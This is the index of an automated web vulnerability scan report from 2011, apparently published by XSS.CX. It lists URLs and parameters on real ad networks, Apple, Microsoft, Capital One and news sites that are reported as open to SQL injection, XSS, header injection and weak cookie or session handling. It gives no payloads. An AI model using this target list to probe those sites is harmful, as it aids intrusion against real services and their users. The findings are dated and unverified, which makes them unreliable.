XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07232011-01 Report generated by XSS.CX at Sat Jul 23 10:10:40 CDT 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. SQL injection
1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]
1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]
1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]
1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]
2. HTTP header injection
2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]
2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]
2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]
2.4. http://ad.doubleclick.net/getcamphist [src parameter]
3. Cross-site scripting (reflected)
3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]
3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]
3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]
3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]
3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]
3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]
3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]
3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]
3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]
3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]
3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]
3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]
3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]
3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]
3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]
3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]
3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]
3.20. http://a.netmng.com/hic/ [click parameter]
3.21. http://a.netmng.com/hic/ [click parameter]
3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]
3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]
3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]
3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]
3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]
3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]
3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]
3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]
3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]
3.31. http://ad.turn.com/server/pixel.htm [sp parameter]
3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
3.34. http://ads.adap.tv/beacons [callback parameter]
3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]
3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]
3.37. http://api.bizographics.com/v1/profile.json [&callback parameter]
3.38. http://api.bizographics.com/v1/profile.json [api_key parameter]
3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter]
3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
3.41. http://api.chartbeat.com/toppages/ [jsonp parameter]
3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter]
3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter]
3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter]
3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter]
3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter]
3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter]
3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter]
3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter]
3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]
3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]
3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]
3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]
3.54. http://event.adxpose.com/event.flow [uid parameter]
3.55. http://home.myyearbook.com/Countries [callback parameter]
3.56. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]
3.57. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]
3.58. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]
3.59. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
3.60. http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
3.61. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
3.62. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
3.63. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
3.64. http://ib.adnxs.com/ab [ccd parameter]
3.65. http://ib.adnxs.com/ab [cnd parameter]
3.66. http://ib.adnxs.com/ab [referrer parameter]
3.67. http://ib.adnxs.com/ab [tt_code parameter]
3.68. http://ib.adnxs.com/ptj [redir parameter]
3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]
3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]
3.71. http://jlinks.industrybrains.com/jsct [ct parameter]
3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
3.73. http://js.revsci.net/gateway/gw.js [csid parameter]
3.74. http://km.support.apple.com/kb/index [doctype parameter]
3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
3.76. http://mm.chitika.net/minimall [callback parameter]
3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter]
3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter]
3.80. http://sgy.sitescout.com/tag.jsp [h parameter]
3.81. http://sgy.sitescout.com/tag.jsp [pid parameter]
3.82. http://sgy.sitescout.com/tag.jsp [w parameter]
3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]
3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter]
3.88. http://sm6.sitemeter.com/js/counter.js [site parameter]
3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]
3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]
3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]
3.92. http://widgets.klout.com/ [from parameter]
3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]
3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter]
3.95. http://www.lijit.com/delivery/fp [n parameter]
3.96. http://www.myyearbook.com/advertising/default.php [n parameter]
3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]
3.98. http://www.myyearbook.com/advertising/default.php [section parameter]
3.99. http://www.myyearbook.com/advertising/default.php [section parameter]
3.100. http://www.myyearbook.com/advertising/default.php [site parameter]
3.101. http://www.myyearbook.com/advertising/default.php [size parameter]
3.102. http://www.myyearbook.com/advertising/default.php [sub parameter]
3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]
3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]
3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]
3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]
3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]
3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]
3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]
3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]
3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]
3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header]
3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]
3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]
3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]
3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]
3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]
3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]
3.129. http://seg.sharethis.com/getSegment.php [__stid cookie]
3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]
3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie]
3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie]
3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]
3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]
4. Flash cross-domain policy
4.1. http://a1.interclick.com/crossdomain.xml
4.2. http://ad.doubleclick.net/crossdomain.xml
4.3. http://altfarm.mediaplex.com/crossdomain.xml
4.4. http://analytics.spongecell.com/crossdomain.xml
4.5. http://api.chartbeat.com/crossdomain.xml
4.6. http://api.facebook.com/crossdomain.xml
4.7. http://cdn.interclick.com/crossdomain.xml
4.8. http://clk.atdmt.com/crossdomain.xml
4.9. http://contextlinks.netseer.com/crossdomain.xml
4.10. http://fls.doubleclick.net/crossdomain.xml
4.11. http://gadgets.justanswer.com/crossdomain.xml
4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml
4.13. http://ic.nexac.com/crossdomain.xml
4.14. http://img.mediaplex.com/crossdomain.xml
4.15. http://l.5min.com/crossdomain.xml
4.16. http://m.webtrends.com/crossdomain.xml
4.17. http://metrics.apple.com/crossdomain.xml
4.18. http://pfiles.5min.com/crossdomain.xml
4.19. http://pixel.everesttech.net/crossdomain.xml
4.20. http://pixel1350.everesttech.net/crossdomain.xml
4.21. http://pshared.5min.com/crossdomain.xml
4.22. http://puma.vizu.com/crossdomain.xml
4.23. http://rad.msn.com/crossdomain.xml
4.24. http://secure-us.imrworldwide.com/crossdomain.xml
4.25. http://syn.5min.com/crossdomain.xml
4.26. http://web2.checkm8.com/crossdomain.xml
4.27. http://www.righthealth.com/crossdomain.xml
4.28. http://community.spiceworks.com/crossdomain.xml
4.29. http://disqus.com/crossdomain.xml
4.30. http://feeds.bbci.co.uk/crossdomain.xml
4.31. http://googleads.g.doubleclick.net/crossdomain.xml
4.32. http://images.apple.com/crossdomain.xml
4.33. http://mm.chitika.net/crossdomain.xml
4.34. http://newsrss.bbc.co.uk/crossdomain.xml
4.35. http://pagead2.googlesyndication.com/crossdomain.xml
4.36. http://pubads.g.doubleclick.net/crossdomain.xml
4.37. http://static.ak.fbcdn.net/crossdomain.xml
4.38. http://www.apple.com/crossdomain.xml
4.39. http://www.disqus.com/crossdomain.xml
4.40. http://www.facebook.com/crossdomain.xml
4.41. http://www.scmagazineus.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://ad.doubleclick.net/clientaccesspolicy.xml
5.2. http://clk.atdmt.com/clientaccesspolicy.xml
5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml
5.4. http://metrics.apple.com/clientaccesspolicy.xml
5.5. http://rad.msn.com/clientaccesspolicy.xml
5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
5.7. http://i.microsoft.com/clientaccesspolicy.xml
5.8. http://i3.microsoft.com/clientaccesspolicy.xml
5.9. http://www.microsoft.com/clientaccesspolicy.xml
6. Cleartext submission of password
6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
6.2. http://forums.vostu.com/
6.3. http://forums.vostu.com/forums/41-Como-Jogar
6.4. http://static.curse.com/themes/common/v6/scripts/core.js
6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
7. XML injection
7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]
7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]
8. Session token in URL
8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
8.3. http://games.myyearbook.com/
8.4. http://games.myyearbook.com/landing/pool
8.5. http://l.sharethis.com/pview
8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage
8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
8.9. http://mt0.googleapis.com/mapslt/ft
8.10. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
8.11. http://www.capitalone.com/redirect.php
8.12. http://www.datacard.com/combined.js
8.13. http://www.datacard.com/id/js/libs/hoverIntent-min.js
8.14. http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js
8.15. http://www.datacard.com/id/js/libs/thickbox-compressed.js
8.16. http://www.datacard.com/id/js/search/highlight-min.js
8.17. http://www.datacard.com/id/swfobject/swfobject.js
8.18. http://www.facebook.com/extern/login_status.php
8.19. http://www.google.com/recaptcha/api/challenge
8.20. http://www.pages05.net/WTS/event.jpeg
9. Password field submitted using GET method
10. Cookie scoped to parent domain
10.1. http://c.microsoft.com/trans_pixel.aspx
10.2. http://clients.mobilecause.com/lists/1227/subscriptions/web.js
10.3. http://games.myyearbook.com/
10.4. http://games.myyearbook.com/landing/pool
10.5. http://hipservice.live.com/gethip.srf
10.6. http://home.myyearbook.com/Countries
10.7. http://home.myyearbook.com/feed/giftFeedItems
10.8. http://home.myyearbook.com/feed/myMagFeedItems
10.9. http://home.myyearbook.com/feed/tvFeedItems
10.10. http://pixel.everesttech.net/2368/gr
10.11. http://pixel1350.everesttech.net/1350/p
10.12. http://t.mookie1.com/t/v1/imp
10.13. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx
10.14. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911
10.15. http://a.netmng.com/hic/
10.16. http://a.tribalfusion.com/j.ad
10.17. http://a1.interclick.com/ColDta.aspx
10.18. http://ad.turn.com/server/ads.js
10.19. http://ad.turn.com/server/pixel.htm
10.20. http://ads.adap.tv/beacons
10.21. http://ads.adap.tv/cookie
10.22. http://ads.pointroll.com/PortalServe/
10.23. http://adx.adnxs.com/mapuid
10.24. http://ak1.abmr.net/is/a.collective-media.net
10.25. http://ak1.abmr.net/is/showadsak.pubmatic.com
10.26. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php
10.27. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php
10.28. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php
10.29. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php
10.30. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php
10.31. http://ap.lijit.com/www/delivery/retarget.php
10.32. http://api.bizographics.com/v1/profile.json
10.33. http://api.bizographics.com/v1/profile.redirect
10.34. http://apr.lijit.com///www/delivery/ajs.php
10.35. http://ar.voicefive.com/bmx3/broker.pli
10.36. http://at.amgdgt.com/ads/
10.37. http://b.scorecardresearch.com/b
10.38. http://b.scorecardresearch.com/p
10.39. http://b.scorecardresearch.com/r
10.40. http://b.voicefive.com/b
10.41. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr
10.42. http://bh.contextweb.com/bh/getuid
10.43. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.44. http://c.atdmt.com/c.gif
10.45. http://c.bing.com/c.gif
10.46. http://c.live.com/c.gif
10.47. http://ce.lijit.com/merge
10.48. http://cf.addthis.com/red/p.json
10.49. http://clk.atdmt.com/goiframe/222276744/331989646/direct
10.50. http://clk.atdmt.com/goiframe/223672189/334126009/direct
10.51. http://cms.quantserve.com/dpixel
10.52. http://code.msdn.microsoft.com/
10.53. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js
10.54. http://code.msdn.microsoft.com/site/upload
10.55. http://community.spiceworks.com/r/595
10.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
10.57. http://cspix.media6degrees.com/orbserv/hbpix
10.58. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/
10.59. http://gam.adnxs.com/gtj
10.60. http://home.live.com/search
10.61. http://home.live.com/search/
10.62. http://home.live.com/search/hip
10.63. http://i.w55c.net/ping_match.gif
10.64. http://ib.adnxs.com/ab
10.65. http://ib.adnxs.com/getuid
10.66. http://ib.adnxs.com/getuidnb
10.67. http://ib.adnxs.com/if
10.68. http://ib.adnxs.com/mapuid
10.69. http://ib.adnxs.com/ptj
10.70. http://ib.adnxs.com/ptj
10.71. http://ib.adnxs.com/ptj
10.72. http://ib.adnxs.com/seg
10.73. http://id.google.com/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif
10.74. http://id.google.com/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif
10.75. http://id.google.com/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif
10.76. http://id.google.com/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif
10.77. http://id.google.com/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif
10.78. http://idcs.interclick.com/Segment.aspx
10.79. http://image2.pubmatic.com/AdServer/Pug
10.80. http://image2.pubmatic.com/AdServer/Pug
10.81. http://image2.pubmatic.com/AdServer/Pug
10.82. http://images.apple.com/global/metrics/js/s_code_h.js
10.83. http://images.apple.com/global/nav/scripts/globalnav.js
10.84. http://images.apple.com/global/nav/styles/navigation.css
10.85. http://images.apple.com/global/scripts/apple_core.js
10.86. http://images.apple.com/global/scripts/browserdetect.js
10.87. http://images.apple.com/global/scripts/content_swap.js
10.88. http://images.apple.com/global/scripts/lib/event_mixins.js
10.89. http://images.apple.com/global/scripts/lib/prototype.js
10.90. http://images.apple.com/global/scripts/lib/scriptaculous.js
10.91. http://images.apple.com/global/scripts/overlay_panel.js
10.92. http://images.apple.com/global/scripts/promomanager.js
10.93. http://images.apple.com/global/scripts/search_decorator.js
10.94. http://images.apple.com/global/scripts/swap_view.js
10.95. http://images.apple.com/global/scripts/view_master_tracker.js
10.96. http://images.apple.com/global/styles/base.css
10.97. http://images.apple.com/macpro/scripts/pagenav.js
10.98. http://images.apple.com/macpro/scripts/performance.js
10.99. http://images.apple.com/metrics/scripts/s_code_h.js
10.100. http://images.apple.com/support/css/base_new.css
10.101. http://images.apple.com/support/css/global/nav/navigation.css
10.102. http://images.apple.com/support/css/suggest2.css
10.103. http://images.apple.com/support/css/support.css
10.104. http://images.apple.com/support/home/css/home2011.css
10.105. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js
10.106. http://images.apple.com/support/iknow/scripts/ACShortcuts.js
10.107. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js
10.108. http://images.apple.com/support/scripts/SCReporting.js
10.109. http://images.apple.com/support/scripts/module_decorator.js
10.110. http://images.apple.com/support/scripts/new_country.js
10.111. http://images.apple.com/support/scripts/new_support_coverage/cookies.js
10.112. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js
10.113. http://images.apple.com/support/scripts/new_support_coverage/functions.js
10.114. http://images.apple.com/support/scripts/psp_geos.js
10.115. http://images.apple.com/support/scripts/support.global.js
10.116. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js
10.117. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js
10.118. http://js.revsci.net/gateway/gw.js
10.119. http://leadback.advertising.com/adcedge/lb
10.120. http://lifescript.us.intellitxt.com/intellitxt/front.asp
10.121. http://lm.trafficmp.com/clicksense/epic
10.122. http://load.exelator.com/load/
10.123. http://m.adnxs.com/msftcookiehandler
10.124. http://media.fastclick.net/w/get.media
10.125. http://media.trafficmp.com/a/js
10.126. http://media.trafficmp.com/a/js
10.127. http://msdn.microsoft.com/magazine/ee336135.aspx
10.128. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0
10.129. http://odb.outbrain.com/utils/get
10.130. http://p.brilig.com/contact/bct
10.131. http://pix04.revsci.net/A11149/a4/0/0/123.302
10.132. http://pix04.revsci.net/D08734/a1/0/3/0.js
10.133. http://pix04.revsci.net/G07608/a4/0/0/pcx.js
10.134. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js
10.135. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js
10.136. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js
10.137. http://pixel.33across.com/ps/
10.138. http://pixel.quantserve.com/pixel
10.139. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif
10.140. http://profile.live.com/Handlers/Plt.mvc
10.141. http://profile.live.com/favicon.ico
10.142. http://r.openx.net/set
10.143. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252
10.144. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
10.145. http://rd.apmebf.com/w/get.media
10.146. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233
10.147. http://rs.gwallet.com/r1/pixel/x960r=772053252
10.148. http://rt.legolas-media.com/lgrt
10.149. http://sales.liveperson.net/hc/54909046/
10.150. http://secure.adnxs.com/seg
10.151. http://segment-pixel.invitemedia.com/pixel
10.152. http://segment-pixel.invitemedia.com/set_partner_uid
10.153. http://segments.adap.tv/data
10.154. http://segments.adap.tv/data/
10.155. https://servicing.capitalone.com/c1/login.aspx
10.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet
10.157. http://sitelife.boston.com/ver1.0/Direct/Jsonp
10.158. http://social.msdn.microsoft.com/Search/en-US
10.159. http://social.msdn.microsoft.com/search/en-US/en-USebb6e
10.160. http://sync.adap.tv/sync
10.161. http://sync.mathtag.com/sync/img
10.162. http://tags.bluekai.com/ids
10.163. http://tags.bluekai.com/site/2731
10.164. http://tags.bluekai.com/site/2751
10.165. http://tags.bluekai.com/site/365
10.166. http://uat.netmng.com/pixel/
10.167. http://user.lucidmedia.com/clicksense/user
10.168. http://user.lucidmedia.com/clicksense/user/browser
10.169. http://vap2den1.lijit.com/www/delivery/lg.php
10.170. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
10.171. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
10.172. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
10.173. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js
10.174. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
10.175. http://visualstudiogallery.msdn.microsoft.com/site/favorites
10.176. http://visualstudiogallery.msdn.microsoft.com/site/search
10.177. http://www.bing.com/fd/ls/l
10.178. http://www.bing.com/search
10.179. http://www.burstnet.com/enlightn/8117//3E06/
10.180. http://www.burstnet.com/enlightn/8171//99D2/
10.181. http://www.capitalone.com/autoloans/before-you-apply.php
10.182. http://www.capitalone.com/autoloans/redirect.php
10.183. http://www.capitalone.com/directbanking/
10.184. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/
10.185. http://www.capitalone.com/redirect.php
10.186. http://www.capitalone.com/stylesheets/https-common/header.css
10.187. http://www.othersonline.com/partner/scripts/myyearbook/alice.js
10.188. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js
10.189. http://www.wtp101.com/pull_sync
11. Cookie without HttpOnly flag set
11.1. http://ads.adxpose.com/ads/ads.js
11.2. http://c.microsoft.com/trans_pixel.aspx
11.3. http://dg.specificclick.net/
11.4. http://event.adxpose.com/event.flow
11.5. http://games.myyearbook.com/
11.6. http://games.myyearbook.com/landing/pool
11.7. http://hipservice.live.com/gethip.srf
11.8. http://home.myyearbook.com/Countries
11.9. http://home.myyearbook.com/feed/giftFeedItems
11.10. http://home.myyearbook.com/feed/myMagFeedItems
11.11. http://home.myyearbook.com/feed/tvFeedItems
11.12. http://members.boston.com/reg/rdb.do
11.13. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140
